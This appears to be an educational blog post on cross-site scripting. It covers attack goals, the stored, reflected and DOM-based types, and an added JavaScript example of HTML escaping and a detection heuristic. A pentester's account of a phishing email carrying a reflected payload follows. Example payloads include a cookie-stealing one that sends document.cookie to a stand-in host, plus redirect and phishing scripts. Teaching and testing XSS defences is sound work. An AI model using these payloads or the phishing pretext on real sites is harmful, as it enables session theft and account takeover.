XSS, or “Cross-site scripting”, is a type of JavaScript injection vulnerability typically found in web applications. It exploits the browser’s trust in the content a site serves and enables attackers to inject malicious client-side script into web pages viewed by other users.

According to PT Security, cross-site scripting carried out on websites made up almost a third of all attacks reported in 2017. Its effect may range from mildly annoying to, in some cases, root access, depending on the web application and the attacker’s motives and resources.


Common XSS Exploitation Goals:


– False Advertising

(<script>alert("You have won 10000 dollars, send your credit details to [email protected]")</script>)


– Stealing Cookies/Authentication Attacks

(<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>)


– Malicious Redirect

(<script>window.location.replace("http://badsite.com");</script>)


– Phishing

(<script>alert("This page has illegal content, please send your login credentials to [email protected] to avoid getting in trouble")</script>)


– Adware

(<script>alert("Hard wood sells the best wood in your area, call us now 1342 232 888")</script>)


Types of XSS

Stored XSS

The most damaging (and least common) type of XSS is Stored XSS (also known as Persistent XSS). In a persistent XSS attack the attacker injects a script carrying the payload that is permanently stored by the target web application and served to every user who views the affected page. A classic example is a malicious script inserted by an attacker into a comment field on a blog, a forum post or a social media post.


Reflected XSS

The second and most common type of XSS is Reflected XSS. Here, the attacker’s payload script has to be part of the HTTP request, which is sent to the web server and reflected back in such a way that the HTTP response includes the payload from the HTTP request. Using phishing emails and other social engineering methods, the attacker sends the victim a malicious link and so tricks them into unknowingly making a request to the server that contains the XSS payload. After clicking the link, the victim ends up executing the attacker’s script, which is reflected by the server and executed inside the victim’s browser.



DOM-based XSS is an advanced type of XSS attack which is made possible when the web application’s client side scripts write user provided data to the Document Object Model (DOM). The data is then read from the DOM by the web application and given to the browser. If the data is incorrectly handled, an attacker can inject an evil payload, which will be stored as part of the DOM and executed when the data is read back from the DOM. Due to the way this attack is executed, it can often evade a lot of anti-exploit systems as the payload is never sent to the server.
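As an added example (not code from the original post), here is the reflected case from above rendered two ways, verbatim and HTML-escaped, together with a crude heuristic for spotting markup in request query strings during log review. The function names `escapeHtml`, `renderUnsafe`, `renderSafe`, `termFromQuery` and `looksLikeMarkup` and the sample query are my own constructions; the payload in the sample is the cookie-stealing one listed earlier on this page.

```javascript
// Added example: a search page that reflects ?q= back into its HTML,
// shown in its vulnerable form and in its hardened (escaped) form.
// Pure string functions, so this runs in Node without a browser.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Encode the five characters that let input break out of an HTML text
// or quoted-attribute context. This is the baseline defence against
// reflected and stored XSS: the browser renders them as text, not markup.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable: the search term is interpolated verbatim, so a payload in
// ?q= becomes live markup in the victim's browser.
function renderUnsafe(term) {
  return `<h1>Results for: ${term}</h1>`;
}

// Hardened: the same page, but the term is escaped before reaching the HTML.
function renderSafe(term) {
  return `<h1>Results for: ${escapeHtml(term)}</h1>`;
}

// Extract q= from a raw query string, the way a reflected payload arrives.
function termFromQuery(queryString) {
  const params = new URLSearchParams(queryString);
  return params.get('q') ?? '';
}

// Cheap log-review heuristic: does a decoded parameter carry a tag,
// an on*= event handler, or a javascript: URL? Expect false positives;
// it is a triage filter, not a sanitizer.
function looksLikeMarkup(value) {
  return /<\s*[a-z!\/]|on[a-z]+\s*=|javascript:/i.test(value);
}

// Constructed sample request: the cookie-stealing payload from this page,
// URL-encoded as it would appear in a GET request.
const SAMPLE_QUERY = 'q=' + encodeURIComponent(
  "<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>"
);

const sampleTerm = termFromQuery(SAMPLE_QUERY);
console.log('unsafe  :', renderUnsafe(sampleTerm));  // live <img onerror=...>
console.log('escaped :', renderSafe(sampleTerm));    // inert &lt;img ...&gt;
console.log('flagged :', looksLikeMarkup(sampleTerm)); // true
```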


Real Life Example

I’d been given the task to perform a pentest for a large EU oil company. Just one problem: there was no way in! All their software was current version with 0 public exploits, I’d no information for a good social attack and their building was well guarded. I was starting to get desperate, and the only thing I had was a few email addresses.

After an hour of probing I found that their backup system had an external web interface. I slowly and carefully investigated each page I could access until I found two reflected XSS possibilities and a private IP disclosure vulnerability. Bingo!

Using this information I emailed the following to their IT department:



“It’s Mikkel from Bulgarian Department.

The backup isn’t working again, if you login you can see on this link I cannot register anyone.

hxxps://</font><script>{encoded XSS payload}</script><font>&result=

Thanks and please hurry, we have four ships waiting!”


Using the reflected XSS as the exploit and the private IP information to add legitimacy I managed to steal the authentication, gain access and very quickly take over the network.


Exercise Time

Here you will have the chance to practice a little of what you’ve just learned. When we are testing for XSS, the most common method of providing a “proof of concept” is to make an alert box appear.




Good luck!
